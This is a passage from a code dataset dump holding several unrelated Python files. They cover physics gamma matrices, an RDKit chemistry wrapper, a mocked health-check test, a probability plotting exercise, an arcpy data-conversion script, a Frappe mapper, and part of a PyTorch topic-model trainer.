[]\npauli.append(None)\npauli.append(numpy.mat([[0, 1.0],\n [1.0, 0]]))\npauli.append(numpy.mat([[0, -1.0j],\n [1.0j, 0]]))\npauli.append(numpy.mat([[1.0, 0],\n [0, -1.0]]))\n\nI2 = numpy.mat(numpy.identity(2))\nO2 = numpy.mat(numpy.zeros((2, 2)))\n\ngamma = {}\nsigma = {}\n\n# Gamma matrices (Dirac basis)\ngamma['dirac'] = []\ngamma['dirac'].append(numpy.bmat([[I2, O2],\n [O2, -1.0*I2]]))\nfor i in range(1, 4):\n gamma['dirac'].append(\n numpy.bmat(\n [[O2, 1.0*pauli[i]],\n [-1.0*pauli[i], O2]]))\ngamma['dirac'].append(None)\ngamma['dirac'].append(\n 1j * gamma['dirac'][0] * gamma['dirac'][1]\n * gamma['dirac'][2] * gamma['dirac'][3])\n\nsigma['dirac'] = numpy.empty((4, 4), dtype=object)\nfor mu in range(0, 4):\n for nu in range(0, 4):\n sigma['dirac'][mu, nu] = 0.5j * (\n gamma['dirac'][mu]*gamma['dirac'][nu]\n - gamma['dirac'][nu]*gamma['dirac'][mu])\n\n# Schroer's Representation\ngamma['schroers'] = []\ngamma['schroers'].append(numpy.bmat([[I2, O2],\n [O2, -1.0*I2]]))\nfor i in range(1, 4):\n gamma['schroers'].append(numpy.bmat([[O2, -1.0j*pauli[i]],\n [1.0j*pauli[i], O2]]))\ngamma['schroers'].append(None)\ngamma['schroers'].append(\n gamma['schroers'][1] * gamma['schroers'][2]\n * gamma['schroers'][3] * gamma['schroers'][0])\n\nsigma['schroers'] = numpy.empty((4, 4), dtype=object)\nfor mu in range(0, 4):\n for nu in range(0, 4):\n sigma['schroers'][mu, nu] = 0.5j * (\n gamma['schroers'][mu] * gamma['schroers'][nu]\n - gamma['schroers'][nu]*gamma['schroers'][mu])\n\nfor mu in range(0, 4):\n for nu in range(0, 4):\n if mu == nu:\n assert (gamma['schroers'][mu]*gamma['schroers'][nu] + gamma['schroers'][nu]*gamma['schroers'][mu] == 2*I).all()\n else:\n assert (gamma['schroers'][mu]*gamma['schroers'][nu] + gamma['schroers'][nu]*gamma['schroers'][mu] == 0*I).all()\n\n\n# QDP++ Representation\ngamma['qdp'] = []\ngamma['qdp'].append(numpy.bmat([[O2, I2],\n [I2, O2]]))\ngamma['qdp'].append(numpy.bmat([[O2, 1.0j*pauli[1]],\n [-1.0j*pauli[1], O2]]))\ngamma['qdp'].append(numpy.bmat([[O2, -1.0j*pauli[2]],\n [1.0j*pauli[2], O2]]))\ngamma['qdp'].append(numpy.bmat([[O2, 1.0j*pauli[3]],\n [-1.0j*pauli[3], O2]]))\ngamma['qdp'].append(None)\ngamma['qdp'].append(\n gamma['qdp'][1] * gamma['qdp'][2] * gamma['qdp'][3] * gamma['qdp'][0])\n\nsigma['qdp'] = numpy.empty((4, 4), dtype=object)\nfor mu in range(0, 4):\n for nu in range(0, 4):\n sigma['qdp'][mu, nu] = 0.5j * (\n gamma['qdp'][mu] * gamma['qdp'][nu]\n - gamma['qdp'][nu] * gamma['qdp'][mu])\n\nfor mu in range(0, 4):\n for nu in range(0, 4):\n if mu == nu:\n assert (gamma['qdp'][mu]*gamma['qdp'][nu] + gamma['qdp'][nu]*gamma['qdp'][mu] == 2*I).all()\n else:\n assert (gamma['qdp'][mu]*gamma['qdp'][nu] + gamma['qdp'][nu]*gamma['qdp'][mu] == 0*I).all()\n\nGamma = {}\nfor eucl_repr in ['schroers','qdp']:\n Gamma[eucl_repr] = {}\n Gamma[eucl_repr]['unpol'] = 0.5 * (I + gamma[eucl_repr][0])\n Gamma[eucl_repr]['pol'] = 0.5*(I + gamma[eucl_repr][0])*1.0j*gamma[eucl_repr][5]*numpy.tensordot(gamma[eucl_repr][1:4],[0,0,1],axes=([0,0]))\n Gamma[eucl_repr]['pol+'] = 0.5*(Gamma[eucl_repr]['unpol'] + Gamma[eucl_repr]['pol'])\n Gamma[eucl_repr]['pol-'] = 0.5*(Gamma[eucl_repr]['unpol'] - Gamma[eucl_repr]['pol'])\n\nepsilon = numpy.zeros((3, 3, 3))\nfor i in range(0, 3):\n for j in range(0, 3):\n for k in range(0, 3):\n if i == j or i == k or j == k:\n epsilon[i, j, k] = 0\n elif (i, j, k) in [(0, 1, 2), (1, 2, 0), (2, 0, 1)]:\n epsilon[i, j, k] = 1\n else:\n epsilon[i, j, k] = -1\n\n\ndef F3(G, J, representation='qdp'):\n def temp_function(p, pp, m):\n ppdotgamma = numpy.tensordot(pp,\n gamma[representation][1:4],\n axes=([0, 0]))\n pdotgamma = numpy.tensordot(p,\n gamma[representation][1:4],\n axes=([0, 0]))\n Epp = numpy.sqrt(numpy.dot(pp, pp) + m**2)\n Ep = numpy.sqrt(numpy.dot(p, p) + m**2)\n lhs = gamma[representation][0] - (1.0j * (ppdotgamma/Epp)) + (m/Epp)*I\n rhs = gamma[representation][0] - (1.0j * (pdotgamma/Ep)) + (m/Ep)*I\n return numpy.real_if_close(0.25 * numpy.trace(G * lhs * J * rhs,\n axis1=-2,\n axis2=-1))\n return temp_function\n\n\ndef F2(G, representation='qdp'):\n def temp_function(p, m):\n Ep = numpy.sqrt(numpy.dot(p, p) + m**2)\n pdotgamma = numpy.tensordot(p,\n gamma[representation][1:4],\n axes=([0,0]))\n lhs = gamma[representation][0] - (1.0j * (pdotgamma/Ep)) + (m/Ep)*I\n # return 0.25 * numpy.trace(G * lhs)\n return numpy.real_if_close(0.5 * numpy.trace(G * lhs))\n return temp_function\n\n\ndef fh_signal(G, J, representation='qdp'):\n def temp_function(p, pp, m):\n assert numpy.allclose(numpy.dot(pp, pp), numpy.dot(p, p)), (\n 'Supplied p and q do not conform to Breit frame')\n return F3(G, J, representation=representation)(p, pp, m)/F2(G, representation=representation)(p, m)\n return temp_function\n\n# def feynman_hellmann_coefficients(G,current,component,representation='qdp'):\n# if current == 'vector':\n# def temp_function(p,pp,m):\n# q = numpy.array(pp) - numpy.array(p)\n# return numpy.array([fh_signal(G,gamma[representation][component],\n# representation=representation)(p,pp,m),\n# fh_signal(G,\n# numpy.tensordot(sigma[representation][component,1:4],\n# q,axes=([0,0]))/(2*m),\n# representation=representation)(p,pp,m)])\n# elif current == 'axial':\n# def temp_function(p,pp,m):\n# q = numpy.concatenate(([0.0],numpy.array(pp)-numpy.array(p)))\n# return numpy.array([\n# fh_signal(G,\n# gamma[representation][component]*gamma[representation][5],\n# representation=representation)(p,pp,m),\n# fh_signal(G,\n# gamma[representation][5]*(1.0j*q[component])/(2*m),\n# representation=representation)(p,pp,m)])\n# else:\n# exit('Error: Unrecognised current ' + current)\n# return temp_function\n","sub_path":"acpy/quantum.py","file_name":"quantum.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"475018899","text":"#!/usr/bin/env python3\n\nfrom QUBEKit.decorators import for_all_methods, timer_logger\n\nfrom pathlib import Path\n\nfrom rdkit.Chem import AllChem, MolFromPDBFile, Descriptors, MolToSmiles, MolToSmarts, MolToMolFile, MolFromMol2File, MolFromMolFile, rdPartialCharges\nfrom rdkit.Chem.rdForceFieldHelpers import MMFFOptimizeMolecule, UFFOptimizeMolecule\n\n\n@for_all_methods(timer_logger)\nclass RDKit:\n \"\"\"Class for controlling useful RDKit functions; try to keep class static.\"\"\"\n\n def __init__(self):\n pass\n\n def read_file(self, filename):\n\n # This handles splitting the paths\n filename = Path(filename)\n\n # Try and read the file\n if filename.suffix == '.pdb':\n mol = MolFromPDBFile(filename.name, removeHs=False)\n try:\n rdPartialCharges.ComputeGasteigerCharges(mol)\n except RuntimeError:\n print('RDKit could not assign the partial charges')\n elif filename.suffix == '.mol2':\n mol = MolFromMol2File(filename.name, removeHs=False)\n elif filename.suffix == '.mol':\n mol = MolFromMolFile(filename.name, removeHs=False)\n else:\n mol = None\n\n return mol\n\n def smiles_to_pdb(self, smiles_string, name=None):\n \"\"\"\n Converts smiles strings to RDKit molobject.\n :param smiles_string: The hydrogen free smiles string\n :param name: The name of the molecule this will be used when writing the pdb file\n :return: The RDKit molecule\n \"\"\"\n # Originally written by venkatakrishnan; rewritten and extended by Chris Ringrose\n\n if 'H' in smiles_string:\n raise SyntaxError('Smiles string contains hydrogen atoms; try again.')\n\n m = AllChem.MolFromSmiles(smiles_string)\n if name is None:\n name = input('Please enter a name for the molecule:\\n>')\n m.SetProp('_Name', name)\n mol_hydrogens = AllChem.AddHs(m)\n AllChem.EmbedMolecule(mol_hydrogens, AllChem.ETKDG())\n AllChem.SanitizeMol(mol_hydrogens)\n\n print(AllChem.MolToMolBlock(mol_hydrogens), file=open(f'{name}.mol', 'w+'))\n AllChem.MolToPDBFile(mol_hydrogens, f'{name}.pdb')\n\n return f'{name}.pdb'\n\n def mm_optimise(self, filename, ff='MMF'):\n \"\"\"\n Perform rough preliminary optimisation to speed up later optimisations.\n :param filename: The name of the input file\n :param ff: The Force field to be used either MMF or UFF\n :return: The name of the optimised pdb file that is made\n \"\"\"\n\n # Get the rdkit molecule\n mol = RDKit().read_file(filename)\n\n force_fields = {'MMF': MMFFOptimizeMolecule, 'UFF': UFFOptimizeMolecule}\n\n force_fields[ff](mol)\n\n AllChem.MolToPDBFile(mol, f'{filename.stem}_rdkit_optimised.pdb')\n\n return f'{filename.stem}_rdkit_optimised.pdb'\n\n def rdkit_descriptors(self, filename):\n \"\"\"\n Use RDKit Descriptors to extract properties and store in Descriptors dictionary.\n :param filename: The molecule input file\n :return: Descriptors dictionary\n \"\"\"\n\n mol = RDKit().read_file(filename)\n # Use RDKit Descriptors to extract properties and store in Descriptors dictionary\n descriptors = {'Heavy atoms': Descriptors.HeavyAtomCount(mol),\n 'H-bond donors': Descriptors.NumHDonors(mol),\n 'H-bond acceptors': Descriptors.NumHAcceptors(mol),\n 'Molecular weight': Descriptors.MolWt(mol),\n 'LogP': Descriptors.MolLogP(mol)}\n\n return descriptors\n\n def get_smiles(self, filename):\n \"\"\"\n Use RDKit to load in the pdb file of the molecule and get the smiles code.\n :param filename: The molecule input file\n :return: The smiles string\n \"\"\"\n\n mol = RDKit().read_file(filename)\n\n return MolToSmiles(mol, isomericSmiles=True, allHsExplicit=True)\n\n def get_smarts(self, filename):\n \"\"\"\n Use RDKit to get the smarts string of the molecule.\n :param filename: The molecule input file\n :return: The smarts string\n \"\"\"\n\n mol = RDKit().read_file(filename)\n\n return MolToSmarts(mol)\n\n def get_mol(self, filename):\n \"\"\"\n Use RDKit to generate a mol file.\n :param filename: The molecule input file\n :return: The name of the mol file made\n \"\"\"\n\n mol = RDKit().read_file(filename)\n\n mol_name = f'{filename.steam}.mol'\n MolToMolFile(mol, mol_name)\n\n return mol_name\n\n def generate_conformers(self, filename, conformer_no=10):\n \"\"\"\n Generate a set of x conformers of the molecule\n :param conformer_no: The amount of conformers made for the molecule\n :param filename: The name of the input file\n :return: A list of conformer position arrays\n \"\"\"\n\n mol = RDKit().read_file(filename)\n\n cons = AllChem.EmbedMultipleConfs(mol, numConfs=conformer_no)\n positions = cons.GetConformers()\n coords = [conformer.GetPositions() for conformer in positions]\n\n return coords\n","sub_path":"QUBEKit/engines/rdkit.py","file_name":"rdkit.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"125482216","text":"from lambda_functions.v1.functions.healthcheck import healthcheck\nimport pytest\nimport requests\n\nfrom lambda_functions.v1.tests.helpers.use_test_data import is_valid_schema\n\n\n@pytest.fixture(autouse=True)\ndef mock_env_setup(monkeypatch):\n monkeypatch.setenv(\"SIRIUS_BASE_URL\", \"http://localhost:8080\")\n monkeypatch.setenv(\"LOGGER_LEVEL\", \"DEBUG\")\n\n\n@pytest.fixture\ndef mock_service_status(monkeypatch):\n class MockResponse(object):\n def __init__(self):\n self.status_code = 200\n self.url = \"http://fake_sirius/api/health-check/service-status\"\n self.headers = {\"myheader\": \"this is some header information\"}\n self.text = {\n \"ok\": \"true\",\n \"membrane\": {\"ok\": \"true\", \"status-code\": 200},\n \"api\": {\"ok\": \"true\", \"status-code\": 200},\n \"ddc-queue\": {\n \"ok\": \"true\",\n \"queue-type\": \"sqs\",\n \"attributes\": {\n \"VisibilityTimeout\": \"30\",\n \"DelaySeconds\": \"0\",\n \"ReceiveMessageWaitTimeSeconds\": \"0\",\n \"ApproximateNumberOfMessages\": \"0\",\n \"ApproximateNumberOfMessagesNotVisible\": \"0\",\n \"ApproximateNumberOfMessagesDelayed\": \"0\",\n \"CreatedTimestamp\": \"1581527140\",\n \"LastModifiedTimestamp\": \"1581527140\",\n \"QueueArn\": \"arn:aws:sqs:eu-west-1:000000000000:ddc.fifo\",\n \"ContentBasedDeduplication\": \"true\",\n \"FifoQueue\": \"true\",\n },\n },\n }\n\n def mock_get(url, **kwargs):\n return MockResponse()\n\n monkeypatch.setattr(requests, \"get\", mock_get)\n\n\ndef test_get_response_success(mock_service_status):\n\n response = healthcheck.lambda_handler(event=None, context=None)\n is_valid_schema(response, \"standard_lambda_response_schema.json\")\n assert response[\"statusCode\"] == 200\n assert len(response[\"body\"]) == 4\n","sub_path":"lambda_functions/v1/tests/healthcheck/test_healthcheck.py","file_name":"test_healthcheck.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"265231136","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as stats\nfrom scipy import signal\n\n#verifying the result obtained with numerical value\nc=2 \n\n#generating two uniform distributions \ny_1 = stats.uniform(loc=-c/4, scale=c/2)\ny_2 = stats.uniform(loc=(2/c)+(c/4), scale=c/2)\n\ndx = 0.0001\nx = np.arange(-4,4,dx)\n\npmf1 = y_1.pdf(x)*dx\npmf2 = y_2.pdf(x)*dx\nconv_pmf = signal.fftconvolve(pmf1,pmf2,'same')\n\npdf1 = pmf1/dx\npdf2 = pmf2/dx\nconv_pdf = conv_pmf/dx\n\n\nprint(\"Area under pdf of Y_1: \" +str(np.trapz(pdf1,x)))\nprint(\"Area under pdf of Y_2: \" +str(np.trapz(pdf2,x)))\nprint(\"Area under convoluted pdf: \" +str(np.trapz(conv_pdf,x)))\n\n# Region 1 of PDF\nx_1 = np.arange(-4, 1, 0.1)\ny_1 = x_1*0\n# Region 2 of PDF\nx_2 = np.arange(1, 2, 0.1)\ny_2= x_2 - 1\n# Region 3 of PDF\nx_3 = np.arange(2, 3, 0.1)\ny_3= 3-x_3\n# Region 4 of PDF\nx_4 = np.arange(3, 4, 0.1)\ny_4= x_4*0\n\n\n# Plotting the points\n\n\n#plotting pdfs of uniform distributions and convoluted function\nplt.plot(x_1, y_1,'b',marker='o',label='X-Theory')\nplt.plot(x_2, y_2,'b',marker='o')\nplt.plot(x_3, y_3,'b',marker='o')\nplt.plot(x_4, y_4,'b',marker='o')\nplt.plot(x,pdf1, label='$Y_2$')\nplt.plot(x,pdf2, label='$Y_1$')\nplt.plot(x,conv_pdf,'r',label='X-Simulation')\nplt.legend(loc='best')\nplt.suptitle('PDFs')\nplt.grid()\nplt.show()\n\n# Normalize the data to a proper PDF\nZ=conv_pdf/ (dx * conv_pdf).sum()\n\n# Compute the CDF\ncdf = np.cumsum(Z * dx)\n\n#Region 1 of CDF\nx_1 = np.arange(-4, 1, 0.1)\ny_1 = x_1*0\n# Region 2 of CDF\nx_2 = np.arange(1, 2, 0.1)\ny_2= (x_2**2-2*x_2+1)/2\n# Region 3 of CDF\nx_3 = np.arange(2, 3, 0.1)\ny_3= (6*x_3-x_3**2-7)/2\n# Region 4 of CDF\nx_4 = np.arange(3, 4, 0.1)\ny_4= x_4**0\n\nplt.plot(x_1, y_1,'b',marker='o',label='Theory')\nplt.plot(x_2, y_2,'b',marker='o')\nplt.plot(x_3, y_3,'b',marker='o')\nplt.plot(x_4, y_4,'b',marker='o')\nplt.plot(x,cdf,'r',label='Simulation')\nplt.xlabel('Random Variable , X')\nplt.ylabel('$F_{X}(x)$')\nplt.suptitle('CDF of X')\nplt.legend(loc='best')\nplt.grid()\nplt.show()","sub_path":"Assignment_2_AI1103.py","file_name":"Assignment_2_AI1103.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"192522867","text":"true = \"true\"\r\ncnt1 = 0\r\ncnt2 = 0\r\nlove = \"love\"\r\n\r\nprint(\"Welcome to the Love Calculator!\")\r\nname1 = input(\"What is your name? \\n\")\r\nname2 = input(\"What is their name? \\n\")\r\n\r\nfor i in range(0, len(true)):\r\n cnt1 += name1.count(true[i])\r\n cnt1 += name2.count(true[i])\r\n\r\nfor i in range(0, len(love)):\r\n cnt2 += name1.count(love[i])\r\n cnt2 += name2.count(love[i])\r\n\r\nloveScore = str(cnt1) + str(cnt2)\r\nloveScore = int(loveScore)\r\nif (loveScore < 10) or (loveScore > 90):\r\n print(f\"Your score is {loveScore}, you go together like coke and mentos.\")\r\nelif (loveScore >= 40) and (loveScore <= 50):\r\n print(f\"Your score is {loveScore}, you are alright together.\")\r\nelse:\r\n print(f\"Your score is {loveScore}\")\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"552332081","text":"# AMP Automation Import Tool\r\n# 6-16-2017\r\n# Created by: Nirav Ilango\r\n# Contact: nilango@usaid.gov or niravilango@gmail.com\r\n# This script automates the conversion of a csv to a shapefile, then converts it into a service to go into the ArcGIS server.\r\n\r\n\r\n# everything has been included to this point other than the server upload\r\nimport arcpy\r\nimport random\r\nimport os\r\n\r\nfile1 = open(r\"P:\\Public\\PublicGIS\\Scripts\\test1.txt\", \"w\") #this is your test file to write to\r\nfile = arcpy.GetParameterAsText(0) #gets file\r\ndata = r\"P:\\Public\\PublicGIS\\Scripts\" #working folder\r\nrandomnum = random.randrange(10000)\r\nstrrandom = str(randomnum)\r\nname = \"D\" + strrandom + \".dbf\" #creates random name for dbf so that same dbf doesn't save\r\npath = os.path.join(data, name)\r\narcpy.ExcelToTable_conversion(file, path) #converts to dbf\r\narcpy.AddField_management(path, \"Lat1\", \"FLOAT\") #adds float field to replace string field\r\narcpy.AddField_management(path, \"Log1\", \"FLOAT\") #adds float field to replace string field\r\nexpression1 = \"func(!Latitude!)\" #for calculate field\r\nexpression2 = \"func(!Longitude!)\"\r\ncodeblock1 = \"\"\"def func(lat):\r\n\ttry:\r\n\t\tval = int(lat)\r\n\texcept ValueError:\r\n\t\tval = 0\r\n\treturn val\r\n\"\"\" #this deals with the gaps in the data, which stops the calculate field\r\ncodeblock2 = \"\"\"def func(log):\r\n\ttry:\r\n\t\tval = int(log)\r\n\texcept ValueError:\r\n\t\tval = 0\r\n\treturn val\r\n\"\"\"\r\narcpy.CalculateField_management(path, \"Lat1\", expression1, \"PYTHON\", codeblock1) #creates float fields to make xy layer\r\narcpy.CalculateField_management(path, \"Log1\", expression2, \"PYTHON\", codeblock2) #craetes float fields to make xy layer\r\narcpy.MakeXYEventLayer_management(path, \"Log1\", \"Lat1\", \"AMP\" ,4326, \"\") #creates temp XY layer\r\ndata = r\"P:\\Public\\PublicGIS\\Scripts\"\r\nrandomnum = random.randrange(10000)\r\nstrrandom = str(randomnum)\r\nfname = \"AMP\" + strrandom + \".shp\"\r\nfc = os.path.join(data, fname)\r\narcpy.CopyFeatures_management(\"AMP\", fc) #saves the AMP layer permanently\r\ncursor = arcpy.UpdateCursor(fc)\r\nfield1 = \"Lat1\"\r\nfor row in cursor: #delets missing data which is where X,Y = 0\r\n\t\tif row.getValue(field1) == 0:\r\n\t\t\tcursor.deleteRow(row)\r\n\r\n#uploading a service\r\n#http://resources.arcgis.com/EN/HELP/MAIN/10.2/index.html#//00sq000000nw000000","sub_path":"amp.py","file_name":"amp.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"395222304","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors\n# License: GNU General Public License v3. See license.txt\n\nfrom __future__ import unicode_literals\nimport frappe, json\nfrom frappe.utils import cstr, cint, get_fullname\nfrom frappe import msgprint, _\nfrom frappe.model.mapper import get_mapped_doc\nfrom erpnext.setup.utils import get_exchange_rate\nfrom erpnext.utilities.transaction_base import TransactionBase\nfrom erpnext.accounts.party import get_party_account_currency\n\nsubject_field = \"title\"\nsender_field = \"contact_email\"\n\n# 2017-01-08 - RM\n# Crée une demande de soumission à partir d'une apportunité\n# 2017-02-17 - JDLP\n# Transferer le code de Erpnext vers Radplusplus\n@frappe.whitelist()\ndef make_request_for_quotation(source_name, target_doc=None):\n\tdoclist = get_mapped_doc(\"Opportunity\", source_name, {\n\t\t\"Opportunity\": {\n\t\t\t\"doctype\": \"Request for Quotation\",\n\t\t\t\"field_map\": {\n\t\t\t\t\"name\": \"opportunity\",\n\t\t\t}\n\t\t},\n\t\t\"Opportunity Item\": {\n\t\t\t\"doctype\": \"Request for Quotation Item\",\n\t\t\t\"field_map\": {\n\t\t\t\t\"uom\": \"stock_uom\"\n\t\t\t}\n\t\t}\n\t}, target_doc)\n\n\treturn doclist\n","sub_path":"radplusplus/crm/doctype/opportunity/opportunity.py","file_name":"opportunity.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"542733066","text":"# -*- coding: utf-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nimport numpy as np\nfrom tqdm import tqdm, trange\n\nfrom layers.seqlayer import sLSTM, mLinear, dLSTM\nfrom layers.vrnnlayer import vrnn\n\nfrom utils import TensorboardWriter\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import FuncFormatter, MaxNLocator\nfrom colorama import Fore\nfrom colorama import Style\nimport os\nfrom datetime import datetime\n# from __init__ import LOGGER\nimport shutil\nimport pickle\n# import scipy.optimize\n\nclass Solver(object):\n def __init__(self, config=None, train_loader=None, test_loader=None, valid_loader=None):\n \"\"\"Class that Builds, Trains and Evaluates SUM-GAN model\"\"\"\n self.config = config\n self.train_loader = train_loader\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = self.config.gpu\n f_vocab = './output/vocab.dat'\n self.rev_vocab = dict()\n with open(f_vocab, 'r') as f:\n for line in f:\n wi = line.split('\\t')\n self.rev_vocab[int(wi[1])] = wi[0]\n\n def build(self):\n # Build Modules\n self.embedding = nn.Embedding(self.config.vocab_size+1, self.config.input_size, padding_idx=0)\n self.topicemb = Variable(torch.FloatTensor(self.config.topic_size, self.config.input_size), requires_grad=True)\n\n if False:\n weights_matrix = pickle.load(open('./output/glove_weight_50d.dat','rb'), encoding='latin1')\n self.embedding.weight.data = torch.Tensor(weights_matrix)\n self.embedding.weight.requires_grad = False\n\n self.rnn_w = sLSTM(self.config.input_size, self.config.hidden_size, num_layers=1)\n self.dLSTM = dLSTM(self.config.input_size*2, self.config.d_hidden_size,\n self.config.topic_size, self.config.MAX_WORD, self.config.batch_size, self.config.vocab_size, self.rev_vocab)\n\n self.prob_q = nn.Sequential(\n nn.Linear(self.config.hidden_size, self.config.hidden_size),\n nn.ReLU(),\n nn.Linear(self.config.hidden_size, self.config.hidden_size),\n nn.ReLU(),\n # nn.Linear(self.config.hidden_size, self.config.hidden_size),\n # nn.ReLU()\n )\n self.Q_mu = nn.Linear(self.config.hidden_size, self.config.topic_size)\n self.Q_var = nn.Sequential(\n nn.Linear(self.config.hidden_size, self.config.topic_size),\n nn.Softplus()\n )\n\n self.prob_p = nn.Sequential(\n nn.Linear(self.config.hidden_size, self.config.hidden_size),\n nn.ReLU(),\n nn.Linear(self.config.hidden_size, self.config.hidden_size),\n nn.ReLU(),\n # nn.Linear(self.config.hidden_size, self.config.hidden_size),\n # nn.ReLU()\n )\n self.P_mu = nn.Linear(self.config.hidden_size, self.config.topic_size)\n self.P_var = nn.Sequential(\n nn.Linear(self.config.hidden_size, self.config.topic_size),\n nn.Softplus()\n )\n\n # self.vrnn = vrnn(self.config.hidden_word_size+self.config.topic_size,self.config.hidden_size)\n # self.vrnn = vrnn(self.config.hidden_size + self.config.topic_size, self.config.hidden_size, self.config.topic_size)\n self.vrnn = vrnn(self.config.hidden_size, self.config.hidden_size,\n self.config.topic_size)\n # self.vrnn = vrnn(self.config.topic_size, self.config.hidden_size,\n # self.config.topic_size)\n\n self.model = nn.ModuleList([\n self.rnn_w, self.vrnn, self.prob_q, self.prob_p,\n self.Q_mu, self.Q_var, self.P_mu, self.P_var, self.dLSTM\n ])\n\n # Init for LDA\n self.wordTopicCounts = np.zeros([self.config.vocab_size, self.config.topic_size])\n self.topicCounts = np.zeros(self.config.topic_size)\n self.backgroundWords = np.zeros(self.config.vocab_size)\n self.topicWords = np.zeros([self.config.vocab_size, self.config.topic_size])\n self.kappa = 0.01 #np.random.rand()\n self.wordTopics = dict()\n\n # self.stopword = pickle.load(open('./output/stopword_index.dat', 'rb'))\n self.stopword = []\n self.stopword.append(0)\n\n # self._lambda = 1.0\n\n if self.config.mode == 'train':\n\n # Overview Parameters\n print('Init Model Parameters')\n torch.nn.init.xavier_uniform_(self.topicemb.data)\n # torch.nn.init.xavier_uniform_(self.embedding.weight.data[1:])\n for name, param in self.model.named_parameters():\n print('\\t' + name + '\\t', list(param.size()))\n if 'weight' in name and 'bnorm' not in name:\n torch.nn.init.xavier_normal_(param)\n if 'bias' in name:\n torch.nn.init.constant_(param, 0.)\n\n # Tensorboard\n # if self.config.write_model:\n current_time = datetime.now().strftime('%b%d_%H-%M-%S')\n self.writer = TensorboardWriter(self.config.logdir + '/' + current_time)\n # Add emb-layer\n self.model.train()\n\n self.model.append(self.embedding)\n # self.embedding.weight[0] = self.embedding.weight[0]*0.\n # Build Optimizers\n self.optimizer = optim.Adam(\n list(self.model.parameters()) + [self.topicemb],\n lr=self.config.lr\n )\n print(self.model)\n\n def load_model(self):\n _fname = './{}/chk_point_{}.pth'.format(self.config.modeldir, self.config.resume_ep)\n if os.path.isfile(_fname):\n print(\"=> loading checkpoint '{}'\".format(_fname))\n if int(self.config.gpu) < 0:\n checkpoint = torch.load(_fname, map_location=lambda storage, loc: storage) # load into cpu-mode\n else:\n checkpoint = torch.load(_fname) # gpu-mode\n self.start_epoch = checkpoint['epoch']\n # checkpoint['state_dict'].pop('1.s_lstm.out.0.bias',None) # remove bias in selector\n self.model.load_state_dict(checkpoint['state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer'][0])\n self.topicemb = checkpoint['topic_emb']\n else:\n print(\"=> no checkpoint found at '{}'\".format(_fname))\n\n def reconstruction_loss(self, h_origin, h_fake):\n \"\"\"L2 loss between original-regenerated features at cLSTM's last hidden layer\"\"\"\n return torch.mean(torch.pow(h_origin - h_fake, 2))\n\n def prior_loss(self, mu, log_variance):\n \"\"\"KL( q(e|x) || N(0,1) )\"\"\"\n kl = -1 + log_variance.exp() + mu.pow(2) - log_variance\n kl_t = torch.transpose(kl,0,1).contiguous().view(mu.shape[1], -1)\n\n return 0.5 * torch.mean(torch.sum(kl_t,-1))\n\n def entropy_loss(self, P, Q): # increasing entropy for scores\n en_p = torch.sum(P * torch.log(P), dim=-1)\n en_q = torch.sum(Q * torch.log(Q), dim=-1)\n return -(torch.mean(en_p) + torch.mean(en_q))\n\n def entropy_topic(self):\n _e = Variable(torch.eye(self.config.topic_size), requires_grad=False)\n beta = self.beta(_e)\n kl_list = []\n for i in range(self.config.topic_size):\n for j in range(i+1, self.config.topic_size):\n Q = beta[i]\n P = beta[j]\n kl_list.append(torch.sigmoid(-torch.sum(Q * torch.log(Q / P),dim=-1)))\n return sum(kl_list)/(self.config.topic_size*(self.config.topic_size-1)/2)\n\n\n def _zero_grads(self):\n self.optimizer.zero_grad()\n\n def save_checkpoint(self, state, filename):\n torch.save(state, filename)\n\n def update_param(self, module):\n for name, param in module.named_parameters():\n temp = torch.exp(param.data)\n param.data = torch.log(temp / torch.sum(temp,0).view(1,-1))\n\n def KLDist2DistBuck(self, Q, P):\n kl = torch.mean(torch.sum(Q * torch.log(Q / P), dim=-1))\n # kl = torch.sum(torch.sum(Q * torch.log(Q / P), dim=-1))\n # kl = T.mean(T.sum(T.switch(T.neq(Q,0) & T.neq(P,0),Q * T.log(Q/P),0), axis=1))\n return kl\n\n def logLK(self, var_x, Q, stop_tensor):\n Q_one = Variable(torch.ones(Q.shape[0], Q.shape[1], 1), requires_grad=False)\n prob_x = (1.-self.config.eps_reg)*self.beta(Q) + self.config.eps_reg*self.bg_distr(Q_one)\n log_prob_x = torch.log(prob_x)\n mask_log = Variable(torch.zeros(log_prob_x.shape), requires_grad=False)\n var_x_ = torch.unsqueeze(var_x,1)\n mask_log = mask_log.scatter_(-1,var_x_,1)\n\n mask_log = mask_log.scatter_(-1, stop_tensor.repeat(mask_log.shape[0],mask_log.shape[1],1), 0) # remove stop-words\n log_prob_x_ = (log_prob_x * mask_log)[:,:,1:] # remove pad-word\n llk = torch.sum(log_prob_x_,-1)\n return torch.mean(llk) # for len of doc = num of sentences\n\n # Apply L-BFGS algorithm\n def fn(self, X):\n # res = 0\n # dtopicWords = np.zeros_like(self.topicWords)\n X = np.reshape(X,self.topicWords.shape)\n bg_topicword = np.expand_dims(self.backgroundWords,1) + X\n Z = np.sum(np.exp(bg_topicword),axis=0)\n lZ = np.log(Z)\n res = -np.sum((bg_topicword - lZ) * self.wordTopicCounts)\n\n # dtopicWord\n dtopicWords = 